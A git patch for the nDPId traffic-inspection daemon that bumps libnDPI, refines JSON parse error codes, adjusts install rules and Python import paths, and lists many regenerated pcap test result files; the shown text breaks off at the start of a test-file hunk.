From 9db048c9d93a00adf4b258d2341b24229d2a45a1 Mon Sep 17 00:00:00 2001
From: Toni Uhlig <matzeton@googlemail.com>
Date: Sun, 27 Feb 2022 02:53:39 +0100
Subject: Serialize flow risk score / confidence.

 * bump libnDPI to 8b062295cc76a60e3905c054ce37bd17669464d1
 * removed ndpi_id_struct's

Signed-off-by: Toni Uhlig <matzeton@googlemail.com>
---
 CMakeLists.txt                                     |   24 +-
 dependencies/nDPIsrvd.h                            |   35 +-
 dependencies/nDPIsrvd.py                           |   17 +-
 examples/py-flow-dashboard/flow-dash.py            |   16 +-
 examples/py-flow-info/flow-info.py                 |   12 +-
 .../py-flow-muliprocess/py-flow-multiprocess.py    |   11 +-
 examples/py-ja3-checker/py-ja3-checker.py          |   10 +-
 examples/py-json-stdout/json-stdout.py             |   10 +-
 .../py-schema-validation/py-schema-validation.py   |   12 +-
 .../py-semantic-validation.py                      |   11 +-
 libnDPI                                            |    2 +-
 nDPId-test.c                                       |    6 +
 nDPId.c                                            |  107 +-
 scripts/get-and-build-libndpi.sh                   |   11 +
 test/results/1kxun.pcap.out                        |  462 +++---
 test/results/443-chrome.pcap.out                   |    8 +-
 test/results/443-curl.pcap.out                     |   18 +-
 test/results/443-firefox.pcap.out                  |   18 +-
 test/results/443-git.pcap.out                      |   18 +-
 test/results/443-opvn.pcap.out                     |   14 +-
 test/results/443-safari.pcap.out                   |   18 +-
 test/results/4in4tunnel.pcap.out                   |    6 +-
 test/results/4in6tunnel.pcap.out                   |   12 +-
 test/results/6in4tunnel.pcap.out                   |    6 +-
 test/results/6in6tunnel.pcap.out                   |    6 +-
 test/results/BGP_Cisco_hdlc_slarp.pcap.out         |   14 +-
 test/results/BGP_redist.pcap.out                   |   14 +-
 test/results/EAQ.pcap.out                          |  148 +-
 test/results/IEC104.pcap.out                       |   18 +-
 test/results/KakaoTalk_chat.pcap.out               |  206 +--
 test/results/KakaoTalk_talk.pcap.out               |   76 +-
 test/results/NTPv2.pcap.out                        |   10 +-
 test/results/NTPv3.pcap.out                        |   14 +-
 test/results/NTPv4.pcap.out                        |   14 +-
 test/results/Oscar.pcap.out                        |   16 +-
 test/results/WebattackRCE.pcap.out                 | 1604 ++++++++++----------
 test/results/WebattackSQLinj.pcap.out              |   46 +-
 test/results/WebattackXSS.pcap.out                 | 1376 ++++++++---------
 test/results/aimini-http.pcap.out                  |   26 +-
 test/results/ajp.pcap.out                          |   14 +-
 test/results/alexa-app.pcapng.out                  |  848 +++++------
 test/results/among_us.pcap.out                     |   14 +-
 test/results/amqp.pcap.out                         |   18 +-
 test/results/android.pcap.out                      |  324 ++--
 test/results/anyconnect-vpn.pcap.out               |  314 ++--
 test/results/anydesk-2.pcap.out                    |   30 +-
 test/results/anydesk.pcap.out                      |   20 +-
 test/results/avast_securedns.pcapng.out            |  170 +--
 test/results/bad-dns-traffic.pcap.out              |   42 +-
 test/results/badpackets.pcap.out                   |    6 +-
 test/results/bitcoin.pcap.out                      |   34 +-
 test/results/bittorrent.pcap.out                   |  102 +-
 test/results/bittorrent_ip.pcap.out                |   31 -
 test/results/bittorrent_utp.pcap.out               |   16 +-
 test/results/bot.pcap.out                          |   23 +
 test/results/bt_search.pcap.out                    |   14 +-
 test/results/capwap.pcap.out                       |   32 +-
 test/results/cassandra.pcap.out                    |   18 +-
 test/results/check_mk_new.pcap.out                 |   14 +-
 test/results/chrome.pcap.out                       |   46 +-
 test/results/coap_mqtt.pcap.out                    |   76 +-
 test/results/cpha.pcap.out                         |   14 +-
 test/results/dcerpc.pcap.out                       |   22 +-
 test/results/dhcp-fuzz.pcapng.out                  |    8 +-
 test/results/diameter.pcap.out                     |   10 +-
 test/results/dlt_ppp.pcap.out                      |    6 +-
 test/results/dnp3.pcap.out                         |   50 +-
 test/results/dns-invalid-chars.pcap.out            |   16 +-
 test/results/dns-tunnel-iodine.pcap.out            |   16 +-
 test/results/dns_ambiguous_names.pcap.out          |   66 +-
 test/results/dns_doh.pcap.out                      |   16 +-
 test/results/dns_dot.pcap.out                      |   16 +-
 test/results/dns_exfiltration.pcap.out             |   16 +-
 test/results/dns_fragmented.pcap.out               |  130 +-
 test/results/dns_invert_query.pcapng.out           |   12 +-
 test/results/dns_long_domainname.pcap.out          |   16 +-
 .../dnscrypt-v1-and-resolver-pings.pcap.out        | 1220 +++++++--------
 test/results/dnscrypt-v2-doh.pcap.out              |  214 +--
 test/results/dnscrypt-v2.pcap.out                  |   32 +
 .../dnscrypt_skype_false_positive.pcapng.out       |    6 +-
 test/results/doq.pcapng.out                        |   14 +-
 test/results/doq_adguard.pcapng.out                |   10 +-
 test/results/dos_win98_smb_netbeui.pcap.out        |   30 +-
 test/results/drda_db2.pcap.out                     |   14 +-
 test/results/dropbox.pcap.out                      |   82 +-
 test/results/dtls.pcap.out                         |   12 +-
 test/results/dtls2.pcap.out                        |   22 +-
 test/results/dtls_certificate.pcapng.out           |   21 +
 test/results/dtls_certificate_fragments.pcap.out   |   16 +-
 .../dtls_session_id_and_coockie_both.pcap.out      |   16 +-
 test/results/encrypted_sni.pcap.out                |   12 +-
 test/results/ethereum.pcap.out                     |  296 ++--
 test/results/ethernetIP.pcap.out                   |   24 +-
 test/results/exe_download.pcap.out                 |   16 +-
 test/results/exe_download_as_png.pcap.out          |   16 +-
 test/results/facebook.pcap.out                     |   22 +-
 test/results/firefox.pcap.out                      |   46 +-
 test/results/fix.pcap.out                          |   58 +-
 test/results/forticlient.pcap.out                  |   50 +-
 test/results/ftp-start-tls.pcap.out                |   14 +-
 test/results/ftp.pcap.out                          |   18 +-
 test/results/ftp_failed.pcap.out                   |   12 +-
 test/results/fuzz-2006-06-26-2594.pcap.out         | 1006 ++++++------
 test/results/fuzz-2006-09-29-28586.pcap.out        |   83 +-
 test/results/fuzz-2020-02-16-11740.pcap.out        |  368 ++---
 test/results/fuzz-2021-06-07-c6c72a0a56.pcap.out   |    6 +-
 test/results/fuzz-2021-10-13.pcap.out              |    6 +-
 test/results/genshin-impact.pcap.out               |   22 +-
 test/results/git.pcap.out                          |   14 +-
 test/results/google_ssl.pcap.out                   |   12 +-
 test/results/googledns_android10.pcap.out          |   56 +-
 test/results/gquic.pcap.out                        |   10 +-
 test/results/gtp_false_positive.pcapng.out         |   12 +-
 test/results/h323-overflow.pcap.out                |   12 +-
 test/results/hangout.pcap.out                      |   14 +-
 test/results/hpvirtgrp.pcap.out                    |   48 +-
 test/results/hsrp0.pcap.out                        |   33 +
 test/results/hsrp2.pcap.out                        |   25 +
 test/results/hsrp2_ipv6.pcapng.out                 |   31 +
 .../http-crash-content-disposition.pcap.out        |    6 +-
 test/results/http-lines-split.pcap.out             |   14 +-
 test/results/http-manipulated.pcap.out             |   18 +-
 test/results/http_auth.pcap.out                    |   14 +-
 test/results/http_ipv6.pcap.out                    |   70 +-
 test/results/iec60780-5-104.pcap.out               |   34 +-
 test/results/imap-starttls.pcap.out                |   14 +-
 test/results/imap.pcap.out                         |   14 +-
 test/results/imaps.pcap.out                        |   18 +-
 test/results/instagram.pcap.out                    |  178 +--
 test/results/ip_fragmented_garbage.pcap.out        |    6 +-
 test/results/iphone.pcap.out                       |  286 ++--
 test/results/ipv6_in_gtp.pcap.out                  |    6 +-
 test/results/irc.pcap.out                          |   14 +-
 test/results/ja3_lots_of_cipher_suites.pcap.out    |    6 +-
 .../ja3_lots_of_cipher_suites_2_anon.pcap.out      |   10 +-
 test/results/kerberos.pcap.out                     |   92 +-
 test/results/kerberos_fuzz.pcapng.out              |    8 +-
 test/results/log4j-webapp-exploit.pcap.out         |   34 +-
 test/results/long_tls_certificate.pcap.out         |   18 +-
 test/results/malformed_dns.pcap.out                |   12 +-
 test/results/malformed_icmp.pcap.out               |   14 +-
 test/results/malware.pcap.out                      |   32 +-
 test/results/memcached.cap.out                     |   14 +-
 test/results/modbus.pcap.out                       |   14 +-
 test/results/monero.pcap.out                       |   18 +-
 test/results/mongodb.pcap.out                      |   30 +-
 test/results/mpeg.pcap.out                         |   16 +-
 test/results/mpegts.pcap.out                       |   10 +-
 test/results/mqtt.pcap.out                         |   27 +
 test/results/mssql_tds.pcap.out                    |   52 +-
 test/results/mysql-8.pcap.out                      |   14 +-
 test/results/nats.pcap.out                         |   18 +-
 ...ndpi_match_string_subprotocol__error.pcapng.out |   12 +-
 test/results/nest_log_sink.pcap.out                |   96 +-
 test/results/netbios.pcap.out                      |   68 +-
 test/results/netbios_wildcard_dns_query.pcap.out   |   12 +-
 test/results/netflix.pcap.out                      |  347 ++---
 test/results/netflow-fritz.pcap.out                |   10 +-
 test/results/netflowv9.pcap.out                    |   10 +-
 test/results/nintendo.pcap.out                     |   98 +-
 test/results/no_sni.pcap.out                       |   54 +-
 test/results/ocs.pcap.out                          |    6 +-
 test/results/ocsp.pcapng.out                       |   50 +-
 test/results/ookla.pcap.out                        |   16 +-
 test/results/openvpn.pcap.out                      |   22 +-
 test/results/os_detected.pcapng.out                |   10 +-
 test/results/pinterest.pcap.out                    |  190 +--
 test/results/pop3.pcap.out                         |   14 +-
 test/results/pps.pcap.out                          |  283 ++--
 test/results/ps_vue.pcap.out                       |   60 -
 test/results/punycode-idn.pcap.out                 |   35 +
 test/results/quic-23.pcap.out                      |   10 +-
 test/results/quic-24.pcap.out                      |   10 +-
 test/results/quic-27.pcap.out                      |   10 +-
 test/results/quic-28.pcap.out                      |   10 +-
 test/results/quic-29.pcap.out                      |   10 +-
 test/results/quic-33.pcapng.out                    |   10 +-
 test/results/quic-fuzz-overflow.pcapng.out         |   10 +-
 test/results/quic-mvfst-22.pcap.out                |   12 +-
 .../quic-mvfst-22_decryption_error.pcap.out        |    6 +-
 test/results/quic-mvfst-27.pcapng.out              |   10 +-
 test/results/quic-mvfst-exp.pcap.out               |   10 +-
 test/results/quic-v2-00.pcapng.out                 |   10 +-
 test/results/quic.pcap.out                         |   44 +-
 test/results/quic046.pcap.out                      |   10 +-
 test/results/quic_0RTT.pcap.out                    |   10 +-
 .../quic_frags_ch_in_multiple_packets.pcapng.out   |   12 +-
 ...h_out_of_order_same_packet_craziness.pcapng.out |  242 +--
 test/results/quic_interop_V.pcapng.out             |  314 ++--
 test/results/quic_q39.pcap.out                     |   10 +-
 test/results/quic_q43.pcap.out                     |   10 +-
 test/results/quic_q46.pcap.out                     |   10 +-
 test/results/quic_q46_b.pcap.out                   |   10 +-
 test/results/quic_q50.pcap.out                     |   10 +-
 test/results/quic_t50.pcap.out                     |   10 +-
 test/results/quic_t51.pcap.out                     |   10 +-
 test/results/quickplay.pcap.out                    |   74 +-
 test/results/radius_false_positive.pcapng.out      |    6 +-
 test/results/rdp.pcap.out                          |   14 +-
 test/results/reasm_crash_anon.pcapng.out           |    6 +-
 test/results/reasm_segv_anon.pcapng.out            |   14 +-
 test/results/reddit.pcap.out                       |  416 ++---
 test/results/rtsp.pcap.out                         |   38 +-
 test/results/rtsp_setup_http.pcapng.out            |   14 +-
 test/results/rx.pcap.out                           |   26 +-
 test/results/s7comm.pcap.out                       |   14 +-
 test/results/safari.pcap.out                       |   46 +-
 test/results/salesforce.pcap.out                   |   18 +-
 test/results/selfsigned.pcap.out                   |   16 +-
 test/results/signal.pcap.out                       |  128 +-
 test/results/simple-dnscrypt.pcap.out              |   42 +-
 test/results/sip.pcap.out                          |   56 +-
 test/results/skype-conference-call.pcap.out        |   14 +-
 test/results/skype.pcap.out                        | 1175 +++++++-------
 test/results/skype_no_unknown.pcap.out             |  853 ++++++-----
 test/results/skype_udp.pcap.out                    |   14 +-
 test/results/smb_deletefile.pcap.out               |   10 +-
 test/results/smbv1.pcap.out                        |   14 +-
 test/results/smpp_in_general.pcap.out              |   14 +-
 test/results/smtp-starttls.pcap.out                |   14 +-
 test/results/smtp.pcap.out                         |   14 +-
 test/results/snapchat.pcap.out                     |   22 +-
 test/results/snapchat_call.pcapng.out              |   10 +-
 test/results/ssdp-m-search.pcap.out                |   16 +-
 test/results/ssh.pcap.out                          |   23 +-
 test/results/ssl-cert-name-mismatch.pcap.out       |   18 +-
 test/results/starcraft_battle.pcap.out             |  194 +--
 test/results/steam.pcap.out                        |  230 +--
 test/results/steam_datagram_relay_ping.pcapng.out  |   10 +-
 test/results/stun_facebook.pcapng.out              |   14 +-
 test/results/stun_signal.pcapng.out                |  102 +-
 test/results/synscan.pcap.out                      |  250 +--
 test/results/syslog.pcapng.out                     |   40 +-
 test/results/teams.pcap.out                        |  402 ++---
 test/results/teamspeak3.pcap.out                   |   12 +-
 test/results/telegram.pcap.out                     |  208 +--
 test/results/teredo.pcap.out                       |   30 +-
 test/results/tftp.pcap.out                         |   22 +-
 test/results/tinc.pcap.out                         |   22 +-
 test/results/tk.pcap.out                           |   28 +-
 test/results/tls-esni-fuzzed.pcap.out              |   12 +-
 test/results/tls-rdn-extract.pcap.out              |   18 +-
 test/results/tls_alert.pcap.out                    |   12 +-
 test/results/tls_certificate_too_long.pcap.out     |  184 +--
 test/results/tls_cipher_lens.pcap.out              |   20 +-
 test/results/tls_esni_sni_both.pcap.out            |   22 +-
 test/results/tls_invalid_reads.pcap.out            |   16 +-
 test/results/tls_long_cert.pcap.out                |   18 +-
 test/results/tls_port_80.pcapng.out                |   14 +-
 test/results/tls_torrent.pcapng.out                |   18 +-
 test/results/tls_verylong_certificate.pcap.out     |   18 +-
 test/results/tor.pcap.out                          |   76 +-
 test/results/trickbot.pcap.out                     |   16 +-
 test/results/tumblr.pcap.out                       |  158 +-
 test/results/ubntac2.pcap.out                      |   42 +-
 test/results/upnp.pcap.out                         |   10 +-
 test/results/viber.pcap.out                        |  132 +-
 test/results/vnc.pcap.out                          |   18 +-
 test/results/vxlan.pcap.out                        |   67 +
 test/results/wa_video.pcap.out                     |   64 +-
 test/results/wa_voice.pcap.out                     |  126 +-
 test/results/waze.pcap.out                         |  173 ++-
 test/results/webex.pcap.out                        |  265 ++--
 test/results/websocket.pcap.out                    |   14 +-
 test/results/wechat.pcap.out                       |  532 +++----
 test/results/weibo.pcap.out                        |  155 +-
 test/results/whatsapp_login_call.pcap.out          |  236 +--
 test/results/whatsapp_login_chat.pcap.out          |   44 +-
 test/results/whatsapp_voice_and_message.pcap.out   |   85 +-
 test/results/whatsappfiles.pcap.out                |   22 +-
 test/results/whois.pcapng.out                      |   20 +-
 test/results/wireguard.pcap.out                    |   18 +-
 test/results/youtube_quic.pcap.out                 |   18 +-
 test/results/youtubeupload.pcap.out                |   22 +-
 test/results/z3950.pcapng.out                      |   16 +-
 test/results/zabbix.pcap.out                       |   14 +-
 test/results/zattoo.pcap.out                       |   30 +
 test/results/zcash.pcap.out                        |   14 +-
 test/results/zoom.pcap.out                         |  170 +--
 test/results/zoom2.pcap.out                        |   40 +-
 280 files changed, 11179 insertions(+), 10940 deletions(-)
 delete mode 100644 test/results/bittorrent_ip.pcap.out
 create mode 100644 test/results/bot.pcap.out
 create mode 100644 test/results/dnscrypt-v2.pcap.out
 create mode 100644 test/results/dtls_certificate.pcapng.out
 create mode 100644 test/results/hsrp0.pcap.out
 create mode 100644 test/results/hsrp2.pcap.out
 create mode 100644 test/results/hsrp2_ipv6.pcapng.out
 create mode 100644 test/results/mqtt.pcap.out
 delete mode 100644 test/results/ps_vue.pcap.out
 create mode 100644 test/results/punycode-idn.pcap.out
 create mode 100644 test/results/vxlan.pcap.out
 create mode 100644 test/results/zattoo.pcap.out

diff --git a/CMakeLists.txt b/CMakeLists.txt
index 4761e2910..9fadb2a95 100644
--- a/CMakeLists.txt
+++ b/CMakeLists.txt
@@ -308,8 +308,28 @@ endif()
 
 install(TARGETS nDPId DESTINATION sbin)
 install(TARGETS nDPIsrvd nDPId-test DESTINATION bin)
-install(FILES dependencies/nDPIsrvd.py DESTINATION share/nDPId)
-install(FILES examples/py-flow-info/flow-info.py DESTINATION bin RENAME nDPIsrvd-flow-info.py)
+install(FILES dependencies/nDPIsrvd.py examples/py-flow-dashboard/plotly_dash.py
+        DESTINATION share/nDPId)
+install(FILES examples/py-flow-info/flow-info.py
+        DESTINATION bin RENAME nDPIsrvd-flow-info.py
+        PERMISSIONS OWNER_READ OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE)
+install(FILES examples/py-flow-dashboard/flow-dash.py
+        DESTINATION bin RENAME nDPIsrvd-flow-dash.py
+        PERMISSIONS OWNER_READ OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE)
+install(FILES examples/py-ja3-checker/py-ja3-checker.py
+        DESTINATION bin RENAME nDPIsrvd-ja3-checker.py
+        PERMISSIONS OWNER_READ OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE)
+install(FILES examples/py-json-stdout/json-stdout.py
+        DESTINATION bin RENAME nDPIsrvd-json-stdout.py
+        PERMISSIONS OWNER_READ OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE)
+install(FILES examples/py-schema-validation/py-schema-validation.py
+        DESTINATION bin RENAME nDPIsrvd-schema-validation.py
+        PERMISSIONS OWNER_READ OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE)
+install(FILES examples/py-semantic-validation/py-semantic-validation.py
+        DESTINATION bin RENAME nDPIsrvd-semantic-validation.py
+        PERMISSIONS OWNER_READ OWNER_EXECUTE GROUP_READ GROUP_EXECUTE WORLD_READ WORLD_EXECUTE)
+install(FILES schema/basic_event_schema.json schema/daemon_event_schema.json
+              schema/flow_event_schema.json schema/packet_event_schema.json DESTINATION share/nDPId)
 
 message(STATUS "--------------------------")
 message(STATUS "nDPId GIT_VERSION........: ${GIT_VERSION}")
diff --git a/dependencies/nDPIsrvd.h b/dependencies/nDPIsrvd.h
index 535941aa1..a4d077234 100644
--- a/dependencies/nDPIsrvd.h
+++ b/dependencies/nDPIsrvd.h
@@ -25,7 +25,7 @@
 #include <stdarg.h>
 #endif
 
-#define nDPIsrvd_MAX_JSON_TOKENS 128
+#define nDPIsrvd_MAX_JSON_TOKENS 256
 #define nDPIsrvd_JSON_KEY_STRLEN 32
 
 #define nDPIsrvd_STRLEN_SZ(s) (sizeof(s) / sizeof(s[0]) - sizeof(s[0]))
@@ -67,7 +67,11 @@ enum nDPIsrvd_parse_return
     PARSE_SIZE_MISSING,
     PARSE_STRING_TOO_BIG,
     PARSE_INVALID_CLOSING_CHAR,
-    PARSE_JSMN_ERROR,
+    PARSE_JSMN_KEY_MISSING,
+    PARSE_JSMN_NOMEM,
+    PARSE_JSMN_INVALID,
+    PARSE_JSMN_PARTIAL,
+    PARSE_JSMN_UNKNOWN_ERROR,
     PARSE_JSON_CALLBACK_ERROR,
     PARSE_JSON_MGMT_ERROR,
     PARSE_FLOW_MGMT_ERROR,
@@ -306,7 +310,11 @@ static inline char const * nDPIsrvd_enum_to_string(int enum_value)
                                                                "PARSE_SIZE_MISSING",
                                                                "PARSE_STRING_TOO_BIG",
                                                                "PARSE_INVALID_CLOSING_CHAR",
-                                                               "PARSE_JSMN_ERROR",
+                                                               "PARSE_JSMN_KEY_MISSING",
+                                                               "PARSE_JSMN_NOMEM",
+                                                               "PARSE_JSMN_INVALID",
+                                                               "PARSE_JSMN_PARTIAL",
+                                                               "PARSE_JSMN_UNKNOWN_ERROR",
                                                                "PARSE_JSON_CALLBACK_ERROR",
                                                                "PARSE_JSON_MGMT_ERROR",
                                                                "PARSE_FLOW_MGMT_ERROR",
@@ -569,6 +577,11 @@ static inline enum nDPIsrvd_connect_return nDPIsrvd_connect(struct nDPIsrvd_sock
 
 static inline enum nDPIsrvd_read_return nDPIsrvd_read(struct nDPIsrvd_socket * const sock)
 {
+    if (sock->buffer.used == sock->buffer.max)
+    {
+        return READ_OK;
+    }
+
     ssize_t bytes_read = read(sock->fd,
                               sock->buffer.ptr.raw + sock->buffer.used,
                               sock->buffer.max - sock->buffer.used);
@@ -966,7 +979,17 @@ static inline enum nDPIsrvd_parse_return nDPIsrvd_parse_line(struct nDPIsrvd_buf
                                     nDPIsrvd_MAX_JSON_TOKENS);
     if (jsmn->tokens_found < 0 || jsmn->tokens[0].type != JSMN_OBJECT)
     {
-        return PARSE_JSMN_ERROR;
+        switch ((enum jsmnerr)jsmn->tokens_found)
+        {
+            case JSMN_ERROR_NOMEM:
+                return PARSE_JSMN_NOMEM;
+            case JSMN_ERROR_INVAL:
+                return PARSE_JSMN_INVALID;
+            case JSMN_ERROR_PART:
+                return PARSE_JSMN_PARTIAL;
+        }
+
+        return PARSE_JSMN_UNKNOWN_ERROR;
     }
 
     return PARSE_OK;
@@ -994,7 +1017,7 @@ static inline enum nDPIsrvd_parse_return nDPIsrvd_parse_all(struct nDPIsrvd_sock
             {
                 if (key != NULL)
                 {
-                    ret = PARSE_JSMN_ERROR;
+                    ret = PARSE_JSMN_KEY_MISSING;
                     break;
                 }
 
@@ -1003,7 +1026,7 @@ static inline enum nDPIsrvd_parse_return nDPIsrvd_parse_all(struct nDPIsrvd_sock
 
                 if (key == NULL)
                 {
-                    ret = PARSE_JSMN_ERROR;
+                    ret = PARSE_JSMN_KEY_MISSING;
                     break;
                 }
             }
diff --git a/dependencies/nDPIsrvd.py b/dependencies/nDPIsrvd.py
index 1d0dec872..0543f1a24 100644
--- a/dependencies/nDPIsrvd.py
+++ b/dependencies/nDPIsrvd.py
@@ -427,10 +427,21 @@ def validateAddress(args):
 global schema
 schema = {'packet_event_schema' : None, 'basic_event_schema' : None, 'daemon_event_schema' : None, 'flow_event_schema' : None}
 
-def initSchemaValidator(schema_dir='./schema'):
+def initSchemaValidator(schema_dirs=[]):
+    if len(schema_dirs) == 0:
+        schema_dirs += [os.path.dirname(sys.argv[0]) + '/../../schema']
+        schema_dirs += [os.path.dirname(sys.argv[0]) + '/../share/nDPId']
+        schema_dirs += [sys.base_prefix + '/share/nDPId']
+
     for key in schema:
-        with open(schema_dir + '/' + str(key) + '.json', 'r') as schema_file:
-            schema[key] = json.load(schema_file)
+        for schema_dir in schema_dirs:
+            try:
+                with open(schema_dir + '/' + str(key) + '.json', 'r') as schema_file:
+                    schema[key] = json.load(schema_file)
+            except FileNotFoundError:
+                continue
+            else:
+                break
 
 def validateAgainstSchema(json_dict):
     import jsonschema
diff --git a/examples/py-flow-dashboard/flow-dash.py b/examples/py-flow-dashboard/flow-dash.py
index 947f5b48c..411029398 100755
--- a/examples/py-flow-dashboard/flow-dash.py
+++ b/examples/py-flow-dashboard/flow-dash.py
@@ -4,18 +4,12 @@ import multiprocessing
 import os
 import sys
 
-import plotly_dash
-
+sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../share/nDPId')
-sys.path.append(os.path.dirname(sys.argv[0]) + '/../usr/share/nDPId')
-try:
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket
-except ImportError:
-    sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket
-
+sys.path.append(sys.base_prefix + '/share/nDPId')
+import nDPIsrvd
+from nDPIsrvd import nDPIsrvdSocket
+import plotly_dash
 
 def nDPIsrvd_worker_onFlowCleanup(instance, current_flow, global_user_data):
     _, shared_flow_dict = global_user_data
diff --git a/examples/py-flow-info/flow-info.py b/examples/py-flow-info/flow-info.py
index bb1326777..06bbf83fb 100755
--- a/examples/py-flow-info/flow-info.py
+++ b/examples/py-flow-info/flow-info.py
@@ -6,15 +6,11 @@ import sys
 import time
 import datetime
 
+sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../share/nDPId')
-sys.path.append(os.path.dirname(sys.argv[0]) + '/../usr/share/nDPId')
-try:
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket, TermColor
-except ImportError:
-    sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket, TermColor
+sys.path.append(sys.base_prefix + '/share/nDPId')
+import nDPIsrvd
+from nDPIsrvd import nDPIsrvdSocket, TermColor
 
 global args
 global whois_db
diff --git a/examples/py-flow-muliprocess/py-flow-multiprocess.py b/examples/py-flow-muliprocess/py-flow-multiprocess.py
index b90ab536d..9014c5f59 100755
--- a/examples/py-flow-muliprocess/py-flow-multiprocess.py
+++ b/examples/py-flow-muliprocess/py-flow-multiprocess.py
@@ -4,16 +4,11 @@ import multiprocessing
 import os
 import sys
 
+sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../share/nDPId')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../usr/share/nDPId')
-try:
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket
-except ImportError:
-    sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket
-
+import nDPIsrvd
+from nDPIsrvd import nDPIsrvdSocket
 
 def mp_worker(unused, shared_flow_dict):
     import time
diff --git a/examples/py-ja3-checker/py-ja3-checker.py b/examples/py-ja3-checker/py-ja3-checker.py
index b7f9df5b1..d3db3b56e 100755
--- a/examples/py-ja3-checker/py-ja3-checker.py
+++ b/examples/py-ja3-checker/py-ja3-checker.py
@@ -8,15 +8,11 @@ import requests
 import sys
 import time
 
+sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../share/nDPId')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../usr/share/nDPId')
-try:
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket
-except ImportError:
-    sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket
+import nDPIsrvd
+from nDPIsrvd import nDPIsrvdSocket
 
 global ja3_fps
 ja3_fps = dict()
diff --git a/examples/py-json-stdout/json-stdout.py b/examples/py-json-stdout/json-stdout.py
index 160a61e0c..bd27d7d80 100755
--- a/examples/py-json-stdout/json-stdout.py
+++ b/examples/py-json-stdout/json-stdout.py
@@ -3,15 +3,11 @@
 import os
 import sys
 
+sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../share/nDPId')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../usr/share/nDPId')
-try:
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket, TermColor
-except ImportError:
-    sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket, TermColor
+import nDPIsrvd
+from nDPIsrvd import nDPIsrvdSocket, TermColor
 
 def onJsonLineRecvd(json_dict, instance, current_flow, global_user_data):
     print(json_dict)
diff --git a/examples/py-schema-validation/py-schema-validation.py b/examples/py-schema-validation/py-schema-validation.py
index 6a07681b3..590ace92e 100755
--- a/examples/py-schema-validation/py-schema-validation.py
+++ b/examples/py-schema-validation/py-schema-validation.py
@@ -3,15 +3,11 @@
 import os
 import sys
 
+sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../share/nDPId')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../usr/share/nDPId')
-try:
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket, TermColor
-except ImportError:
-    sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket, TermColor
+import nDPIsrvd
+from nDPIsrvd import nDPIsrvdSocket, TermColor
 
 class Stats:
     lines_processed = 0
@@ -40,7 +36,7 @@ if __name__ == '__main__':
     sys.stderr.write('Recv buffer size: {}\n'.format(nDPIsrvd.NETWORK_BUFFER_MAX_SIZE))
     sys.stderr.write('Connecting to {} ..\n'.format(address[0]+':'+str(address[1]) if type(address) is tuple else address))
 
-    nDPIsrvd.initSchemaValidator(os.path.dirname(sys.argv[0]) + '/../../schema')
+    nDPIsrvd.initSchemaValidator()
 
     nsock = nDPIsrvdSocket()
     nsock.connect(address)
diff --git a/examples/py-semantic-validation/py-semantic-validation.py b/examples/py-semantic-validation/py-semantic-validation.py
index 019194dac..3ca90edcf 100755
--- a/examples/py-semantic-validation/py-semantic-validation.py
+++ b/examples/py-semantic-validation/py-semantic-validation.py
@@ -3,16 +3,11 @@
 import os
 import sys
 
+sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../share/nDPId')
 sys.path.append(os.path.dirname(sys.argv[0]) + '/../usr/share/nDPId')
-try:
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket, TermColor
-except ImportError:
-    sys.path.append(os.path.dirname(sys.argv[0]) + '/../../dependencies')
-    import nDPIsrvd
-    from nDPIsrvd import nDPIsrvdSocket, TermColor
-
+import nDPIsrvd
+from nDPIsrvd import nDPIsrvdSocket, TermColor
 
 class Stats:
     event_counter   = dict()
diff --git a/libnDPI b/libnDPI
index c53c82d48..8b062295c 160000
--- a/libnDPI
+++ b/libnDPI
@@ -1 +1 @@
-Subproject commit c53c82d4823b5a8f856d1375155ac5112b68e8af
+Subproject commit 8b062295cc76a60e3905c054ce37bd17669464d1
diff --git a/nDPId-test.c b/nDPId-test.c
index 9300420ea..b2bad7673 100644
--- a/nDPId-test.c
+++ b/nDPId-test.c
@@ -548,6 +548,12 @@ static void * distributor_client_mainloop_thread(void * const arg)
                 if (parse_ret != PARSE_NEED_MORE_DATA)
